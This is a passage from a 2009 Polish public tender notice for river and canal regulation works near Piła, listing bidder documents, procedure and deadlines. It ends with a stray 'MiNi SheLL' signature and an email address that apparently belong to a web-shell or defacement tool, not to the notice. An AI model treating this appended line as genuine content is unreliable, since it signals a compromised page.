Wykaz wykonywanych przez wykonawców robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krót-szy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia tj. wykonali zamówienia polegające na wykonywaniu robót regulacyjnych rzek i ka-nałów (kształtowaniu przekroju podłużnego i poprzecznego rzek i kanałów) wraz z budową , odbudową i remontem budowli wodnych (doświadczenie zawodowe), z podaniem ich wartości oraz daty i miejsca wyko-nania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie. (min. jed-no zamówienie) 2.6 Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca, które będą uczestniczyć w wykony-waniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych doświadczenia i wykształce-nia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych czynności wraz z dokumentami potwierdzającymi posiadanie wymaganych : 2.6.1. uprawnień budowlanych kierownika budowy w specjalności: - melioracji wodnych lub - inżynierii wodnej lub - wodno-melioracyjnej lub - konstrukcyjno-inżynieryjnej w zakresie budowli hydrotechnicznych lub - konstrukcyjno-budowlanej w zakresie pełnym lub - konstrukcyjno-budowlanej w ograniczonym zakresie (które uprawniają do kierowania robotami związanymi z obiektem budowlanym w zakresie gospodarki wodnej i melioracji wodnych) lub - ewentualnie innej określonej zgodnie z art. 12a ustawy z dnia 07.07.1994r. Prawo budowlane (Dz. U. 06.156.1118 ze zmianami) 2.6.2 zaświadczenia o przynależności do właściwej izby samorządu zawodowego z aktualnym terminem ważności 2.7 Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym art. 24 ust. 1 pkt. 4 do 8 pzp tj. na temat karalności oferenta, /a w przypadku gdy oferent jest osobą prawną, informacje powinny dotyczyć urzędujących członków władz/, wydana nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. (składa także każdy podmiot z osobna, gdy występują wspólnie), 2.8 Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym art. 24 ust. 1 pkt. 9 pzp (podmioty zbiorowe), wydana nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. (składa także każdy podmiot z osobna, gdy występują wspólnie), 2.9 Aktualna polisa lub inny dokument ubezpieczenia oferenta od odpowiedzialności cywilnej OC w zakresie prowadzonej działalności gospodarczej. (wraz z potwierdzeniem opłacenia (składki) polisy, jeżeli nie wynika to z samej polisy. Wykonawca obowiązany jest przedstawić Zamawiającemu polisę ubezpieczenia od zdarzeń losowych (następstw powodzi, deszczu nawalnego, obsunięć ziemi) w terminie nie później niż 7 dni po zawarciu umowy. 2.10 Wykonawcy występujący wspólnie winni dołączyć dokument, w którym ustanawiają pełnomocnika do re-prezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i za-warciu umowy w sprawie zamówienia publicznego. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców. Wykonawcy działający wspólnie ponoszą solidarna odpowiedzialność za wykonanie lub nienależyte wykonanie zamówienia. 2.11 Informacji z banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w którym wykonawca posiada rachunek, potwierdzającej wysokość środków finansowych lub zdolność kredytową wykonawcy w wysoko-ści co najmniej 400 tys. zł (czterysta tysięcy złotych 00/100), na wykonanie przedmiotowego zamówienia wystawionej nie wcześniej niż 3 miesiące przez upływem terminu składania ofert. (Środki finansowe podane w walucie innej niż polskiej, przeliczone będą według kursów wyznaczonych na dzień składania ofert z Tabe-li kursów średnich walut obcych ogłaszanych przez Narodowy Bank Polski) 2.12 Oświadczenie, iż Wykonawca akceptuje warunki fakturowania/płatności podane w SIWZ. 3 Kosztorys ofertowy sporządzony zgodnie z opisem sposobu obliczania ceny oferty, 4 Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej JEŻELI WYKONAWCA MA SIEDZIBĘ LUB MIEJSCE ZAMIESZKANIA POZA TERYTORIUM RZECZY-POSPOLITEJ POLSKIEJ, ZAMIAST DOKUMENTÓW: a) aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji dzia-łalności gospodarczej, b) aktualnych zaświadczeń właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakła-du Ubezpieczeń Społecznych c) i informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, - wykonawca składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce za-mieszkania, potwierdzające odpowiednio, że: ad. a) nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, ad. b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, ad. c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. Zamiast informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy: - wykonawca składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pocho-dzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszcze-nie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym oświadczenie złożo-ne przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodo-wego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania wystawiony odpowiednio jak powyżej. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę. 5 Dokumenty wymagane w przypadku składania oferty wspólnej. Oferta winna zawierać dokumenty ww pkt 6.2.1) 6.2.3) 6.2.4) 6.2.7) 6.2.8) dla każdego partnera z osobna, pozostałe dokumenty składane są wspólnie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wzmiuw.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wielkopolski Zarząd Melioracji i Urządzeń Wodnych w Poznaniu Rejonowy Oddział w Pile, 64-920 Piła, ul. Motylewska 7.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.09.2009 godzina 09:00, miejsce: Wielkopolski Zarząd Melioracji i Urządzeń Wodnych w Poznaniu Rejonowy Oddział w Pile, 64-920 Piła, ul. Motylewska 7 - pok. 129 - sekretariat I piętro..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com